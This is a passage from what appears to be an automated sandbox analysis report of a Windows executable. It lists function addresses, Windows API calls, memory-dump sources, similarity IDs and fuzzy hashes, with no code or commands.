                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: 636cc0f9b50e5cf6edb25c135561115cf1c733baf15422885a125806139f3f55
                                          • Instruction ID: c01ad9715a3390bbe8187181b79a34d1b575266ec33798e9e08c7a3f5b44754f
                                          • Opcode Fuzzy Hash: 636cc0f9b50e5cf6edb25c135561115cf1c733baf15422885a125806139f3f55
                                          • Instruction Fuzzy Hash: BB318335904205EBDB10EF95DC85EAEBB78EF45700F2440B6F904AB296DB70DE94CBA0
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00136810
                                          • GetDC.USER32(00000000), ref: 00136818
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00136823
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0013682F
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0013686B
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0013687C
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0013964F,?,?,000000FF,00000000,?,000000FF,?), ref: 001368B6
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001368D6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 1591ff01c461d3ef8c36b74dc42cc95c169c42fca3b0f001537d56f55df113dc
                                          • Instruction ID: 5f1024d5a40f8b26a366238aa85ec2bb0a33e4106e5f71c9f5712b45e8c282d2
                                          • Opcode Fuzzy Hash: 1591ff01c461d3ef8c36b74dc42cc95c169c42fca3b0f001537d56f55df113dc
                                          • Instruction Fuzzy Hash: BB316B76101214BFEB118F51CC8AFAA3BA9EF4E765F044065FF089A2A1D7759891CBB0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 19d85950250ad0bb3d6f6fc7141e744d200d1db42bd10c9b4056fe99cba74f20
                                          • Instruction ID: 95998ac9603c4d5a8d3bd2cdc8ae5a40122c5bd13c44cca6d25b264534106c9b
                                          • Opcode Fuzzy Hash: 19d85950250ad0bb3d6f6fc7141e744d200d1db42bd10c9b4056fe99cba74f20
                                          • Instruction Fuzzy Hash: A721D4726052057BD20877208E82FEB376CDF25794B048222FD46A63D3EB90DE118EF5
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                          • _wcstok.LIBCMT ref: 0011F2D7
                                          • _wcscpy.LIBCMT ref: 0011F366
                                          • _memset.LIBCMT ref: 0011F399
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: 84c16ac7ef5066beb4123ba43b74d8caea1fe35d74b662bc4f553be9762edafc
                                          • Instruction ID: ee88b981c045aef990b786532327939c94547c73a8d74759521a5d2e0ba77c91
                                          • Opcode Fuzzy Hash: 84c16ac7ef5066beb4123ba43b74d8caea1fe35d74b662bc4f553be9762edafc
                                          • Instruction Fuzzy Hash: 74C16C715083419FC718EF64C895ADEB7E5BF89350F00492DF899972A3DB30E946CB92
                                          APIs
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001272EB
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0012730C
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0012731F
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 001273D5
                                          • inet_ntoa.WSOCK32(?), ref: 00127392
                                            • Part of subcall function 0010B4EA: _strlen.LIBCMT ref: 0010B4F4
                                            • Part of subcall function 0010B4EA: _memmove.LIBCMT ref: 0010B516
                                          • _strlen.LIBCMT ref: 0012742F
                                          • _memmove.LIBCMT ref: 00127498
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: 379b3f19417f2ae0c3646f3872254de2853ab4ae67d7e01e9b4977464fe8cfc8
                                          • Instruction ID: e295fb6c54cfc7f79cf4945128273d643cecfe0e33a9cb5d5c3113ec0d442007
                                          • Opcode Fuzzy Hash: 379b3f19417f2ae0c3646f3872254de2853ab4ae67d7e01e9b4977464fe8cfc8
                                          • Instruction Fuzzy Hash: E781A071508210ABD314EB24DC96FABB7A8EF84714F10451DF9559B2E3EB70ED41CBA1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 913bd731271dff28e3e3f8c17b041f95e1a4270a8bbc7a60a6bb894befd32fcc
                                          • Instruction ID: a91b7ec4cae45d14d2ef26747dff829d98e0f609f76fcbc4ede41ebbbba5cf25
                                          • Opcode Fuzzy Hash: 913bd731271dff28e3e3f8c17b041f95e1a4270a8bbc7a60a6bb894befd32fcc
                                          • Instruction Fuzzy Hash: 1E716D74900109EFCB15CF59CC98AEEBBB9FF8A314F648159F915AB251CB309A51CBA0
                                          APIs
                                          • IsWindow.USER32(00C055F0), ref: 0013BA5D
                                          • IsWindowEnabled.USER32(00C055F0), ref: 0013BA69
                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0013BB4D
                                          • SendMessageW.USER32(00C055F0,000000B0,?,?), ref: 0013BB84
                                          • IsDlgButtonChecked.USER32(?,?), ref: 0013BBC1
                                          • GetWindowLongW.USER32(00C055F0,000000EC), ref: 0013BBE3
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0013BBFB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: a85e91679d719458dd0faef4ec83f68fe61678c5fde0f4434c3d40366c467c7f
                                          • Instruction ID: 24cad3ac3b2f08eacf08a2021662b7055b52796e60954b85c19094dd9dab4e6c
                                          • Opcode Fuzzy Hash: a85e91679d719458dd0faef4ec83f68fe61678c5fde0f4434c3d40366c467c7f
                                          • Instruction Fuzzy Hash: 5671C234609604EFDB259F54C8D4FBAB7B5EF4A300F144059EB4A972A5EB31AD90CB60
                                          APIs
                                          • _memset.LIBCMT ref: 0012FB31
                                          • _memset.LIBCMT ref: 0012FBFA
                                          • ShellExecuteExW.SHELL32(?), ref: 0012FC3F
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                          • GetProcessId.KERNEL32(00000000), ref: 0012FCB6
                                          • CloseHandle.KERNEL32(00000000), ref: 0012FCE5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: 128b07854de5864f55a4bace8c3644828da99bdede756ceecfce84f709d83eb7
                                          • Instruction ID: 2d30b9d500a1afb09125cb95e4a60c793e2f3f64bb518c32143c2e09a097b0e0
                                          • Opcode Fuzzy Hash: 128b07854de5864f55a4bace8c3644828da99bdede756ceecfce84f709d83eb7
                                          • Instruction Fuzzy Hash: 2B61BF75A006299FCB14EF54D4909EDBBF5FF48310F14846DE846AB352CB30AE52CB90
                                          APIs
                                          • GetParent.USER32(?), ref: 0011178B
                                          • GetKeyboardState.USER32(?), ref: 001117A0
                                          • SetKeyboardState.USER32(?), ref: 00111801
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0011182F
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0011184E
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00111894
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001118B7
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: be9a47122856b6d568803d45c074d7706a72afec1120bf0812412f2faea7ea64
                                          • Instruction ID: eec1267e7e381d1919ff628caf52d3e7e9a67e775cf5021265c3966e51c708aa
                                          • Opcode Fuzzy Hash: be9a47122856b6d568803d45c074d7706a72afec1120bf0812412f2faea7ea64
                                          • Instruction Fuzzy Hash: B551D5A0A187D53DFB3A8234CC55BFAFEE95B06304F0885A9E2D5468D2D398ECD4D750
                                          APIs
                                          • GetParent.USER32(00000000), ref: 001115A4
                                          • GetKeyboardState.USER32(?), ref: 001115B9
                                          • SetKeyboardState.USER32(?), ref: 0011161A
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00111646
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00111663
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001116A7
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001116C8
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: dd9cb519c7b7be274d27f969abda78a525b14e476e6a655bce528159ec87c804
                                          • Instruction ID: 5e8db00edaaeb6013713161511ffc9d7f8b101aeab3da67edc01c7555e940723
                                          • Opcode Fuzzy Hash: dd9cb519c7b7be274d27f969abda78a525b14e476e6a655bce528159ec87c804
                                          • Instruction Fuzzy Hash: 845106A09087D53DFB3A83248C01BFAFEA95F06300F0C44A9E2D5469C2D7D5ACC4E761
                                          APIs
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: b5a2f89175cc8ebcbd52db5238f795d8e9e3e6c99f69bb3d13ffad7701d0ae52
                                          • Instruction ID: 5720f8bea791901cda3a9c24e2c1794cb86937a0f18fc18babb0ec2cbbb11316
                                          • Opcode Fuzzy Hash: b5a2f89175cc8ebcbd52db5238f795d8e9e3e6c99f69bb3d13ffad7701d0ae52
                                          • Instruction Fuzzy Hash: 5D4170A5C10618B6CB51EBF488469DFB3BD9F04320F504866E509E3222E734A655C3FA
                                          APIs
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00113B8A,?), ref: 00114BE0
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00113B8A,?), ref: 00114BF9
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00113BAA
                                          • _wcscmp.LIBCMT ref: 00113BC6
                                          • MoveFileW.KERNEL32(?,?), ref: 00113BDE
                                          • _wcscat.LIBCMT ref: 00113C26
                                          • SHFileOperationW.SHELL32(?), ref: 00113C92
                                          Strings
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: ac85087d862f7c267a6fddbd6da629b1b78cd54342c79ca1bcc4587efca2197f
                                          • Instruction ID: b074561d652e336f62000b3bf8cecd6aaec9fe58a8d978e064bc5bad787eec47
                                          • Opcode Fuzzy Hash: ac85087d862f7c267a6fddbd6da629b1b78cd54342c79ca1bcc4587efca2197f
                                          • Instruction Fuzzy Hash: AB416D7150C344AAC75AEF64C481ADBB7ECAF99340F40093EF499D3292EB34D689C766
                                          APIs
                                          • _memset.LIBCMT ref: 001378CF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00137976
                                          • IsMenu.USER32(?), ref: 0013798E
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001379D6
                                          • DrawMenuBar.USER32 ref: 001379E9
                                          Strings
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: 2777babd94b91f647a5d10a65d1e43ceac896c9c30d4afda1bb1e19a14a6b5a8
                                          • Instruction ID: 9c0e9b01cc4f5fb202d1d8eb104ca6566ae661c7f360f9c92c15f2e5a912c886
                                          • Opcode Fuzzy Hash: 2777babd94b91f647a5d10a65d1e43ceac896c9c30d4afda1bb1e19a14a6b5a8
                                          • Instruction Fuzzy Hash: FD415FB5A04209EFDB20DF54D884F9ABBF5FF09325F048269E95597290C730AD94CF90
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00131631
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013165B
                                          • FreeLibrary.KERNEL32(00000000), ref: 00131712
                                            • Part of subcall function 00131602: RegCloseKey.ADVAPI32(?), ref: 00131678
                                            • Part of subcall function 00131602: FreeLibrary.KERNEL32(?), ref: 001316CA
                                            • Part of subcall function 00131602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001316ED
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001316B5
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 448aa7e50cc9840cc9f220d6f40b6564feb4a1bbe5b75cb4db7d2cc5edc9e28a
                                          • Instruction ID: ece6e2e3dd89c91429a0292b4749101945a4d40d11d0cc16ddbadf730c763575
                                          • Opcode Fuzzy Hash: 448aa7e50cc9840cc9f220d6f40b6564feb4a1bbe5b75cb4db7d2cc5edc9e28a
                                          • Instruction Fuzzy Hash: 8D313CB5901109BFDB15DF91DC89EFEB7BCEF09340F040169F901A2150EB749E859BA0
                                          APIs
                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00136911
                                          • GetWindowLongW.USER32(00C055F0,000000F0), ref: 00136944
                                          • GetWindowLongW.USER32(00C055F0,000000F0), ref: 00136979
                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001369AB
                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001369D5
                                          • GetWindowLongW.USER32(?,000000F0), ref: 001369E6
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00136A00
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: f231c8191684297f7c120f6ca05109845b187c63623075a36114de732bb5414f
                                          • Instruction ID: 478f7b551ae3c847ba24318fe2075d1acb4311d713117d66cb968c5bf95fb752
                                          • Opcode Fuzzy Hash: f231c8191684297f7c120f6ca05109845b187c63623075a36114de732bb5414f
                                          • Instruction Fuzzy Hash: DF313235608154EFDB21CF19DC88F6437E1EB4A358F1981A4FA098F6B2CB72AC90CB51
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E2CA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E2F0
                                          • SysAllocString.OLEAUT32(00000000), ref: 0010E2F3
                                          • SysAllocString.OLEAUT32(?), ref: 0010E311
                                          • SysFreeString.OLEAUT32(?), ref: 0010E31A
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0010E33F
                                          • SysAllocString.OLEAUT32(?), ref: 0010E34D
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 706c7871465fe8556c7e751590c2441efc9dcf417673867439c56f4792ec1f1d
                                          • Instruction ID: 464c82283bf03500f93a3bb63dda35d00bd49f70b358e1a79707b8ec960a65b5
                                          • Opcode Fuzzy Hash: 706c7871465fe8556c7e751590c2441efc9dcf417673867439c56f4792ec1f1d
                                          • Instruction Fuzzy Hash: 74218676604219AFDB10DFA9DC88CBB77ECFB09360B044525FE54DB2A0D770AD818760
                                          APIs
                                            • Part of subcall function 00128475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001268B1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 001268C0
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001268F9
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00126902
                                          • WSAGetLastError.WSOCK32 ref: 0012690C
                                          • closesocket.WSOCK32(00000000), ref: 00126935
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0012694E
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: 721fa4037db32660b3bbac482f529951e4871e8850fe4a7b60f79f00abc4d73f
                                          • Instruction ID: 337ee41a9adae277fe0cbc003d510d92d024094b9b9c86782142ef19ba7e04d1
                                          • Opcode Fuzzy Hash: 721fa4037db32660b3bbac482f529951e4871e8850fe4a7b60f79f00abc4d73f
                                          • Instruction Fuzzy Hash: E531E771600214AFDF10AF24DC85BBD77A9EB45725F044019FD05A72D2CB70AD54CBA1
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E3A5
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E3CB
                                          • SysAllocString.OLEAUT32(00000000), ref: 0010E3CE
                                          • SysAllocString.OLEAUT32 ref: 0010E3EF
                                          • SysFreeString.OLEAUT32 ref: 0010E3F8
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0010E412
                                          • SysAllocString.OLEAUT32(?), ref: 0010E420
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: b6328c5abef501c91f15966c8a1f7f1b0d3e249c0f79a91bb12772b2d945027e
                                          • Instruction ID: eec096a9ea5460f93e640c5b597e199be60f809dbd9d3cdbe39c73748c9c52b4
                                          • Opcode Fuzzy Hash: b6328c5abef501c91f15966c8a1f7f1b0d3e249c0f79a91bb12772b2d945027e
                                          • Instruction Fuzzy Hash: 9B218B35604204AFDB149FA9DC88DAE77ECEB0D3607448529FA45CB2A1D770DC818764
                                          APIs
                                            • Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                            • Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
                                            • Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00137C57
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00137C64
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00137C6F
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00137C7E
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00137C8A
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: c9ac71b49649b147b1dd135beba8fa395b8def73c458402e3e1e931cd5c31a35
                                          • Instruction ID: 908b351f5d768a5d36a9ab224917dcd9f65d9de3c4a9320a37e00afc5462f983
                                          • Opcode Fuzzy Hash: c9ac71b49649b147b1dd135beba8fa395b8def73c458402e3e1e931cd5c31a35
                                          • Instruction Fuzzy Hash: 1611B6B2140219BEEF158F60CC85EE77F5DEF09798F015114BB08A20A0C7719C61DBA0
                                          APIs
                                          • __init_pointers.LIBCMT ref: 000D9D16
                                            • Part of subcall function 000D33B7: EncodePointer.KERNEL32(00000000), ref: 000D33BA
                                            • Part of subcall function 000D33B7: __initp_misc_winsig.LIBCMT ref: 000D33D5
                                            • Part of subcall function 000D33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000DA0D0
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000DA0E4
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000DA0F7
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000DA10A
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000DA11D
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000DA130
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000DA143
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000DA156
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000DA169
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000DA17C
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000DA18F
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000DA1A2
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000DA1B5
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000DA1C8
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000DA1DB
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000DA1EE
                                          • __mtinitlocks.LIBCMT ref: 000D9D1B
                                          • __mtterm.LIBCMT ref: 000D9D24
                                            • Part of subcall function 000D9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000D9D29,000D7EFD,0016CD38,00000014), ref: 000D9E86
                                            • Part of subcall function 000D9D8C: _free.LIBCMT ref: 000D9E8D
                                            • Part of subcall function 000D9D8C: DeleteCriticalSection.KERNEL32(00170C00,?,?,000D9D29,000D7EFD,0016CD38,00000014), ref: 000D9EAF
                                          • __calloc_crt.LIBCMT ref: 000D9D49
                                          • __initptd.LIBCMT ref: 000D9D6B
                                          • GetCurrentThreadId.KERNEL32 ref: 000D9D72
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: b27b7e1ff2e1777eac08d8f3d9fb5395fd52c363ab43bed769a738d4cf96f9a5
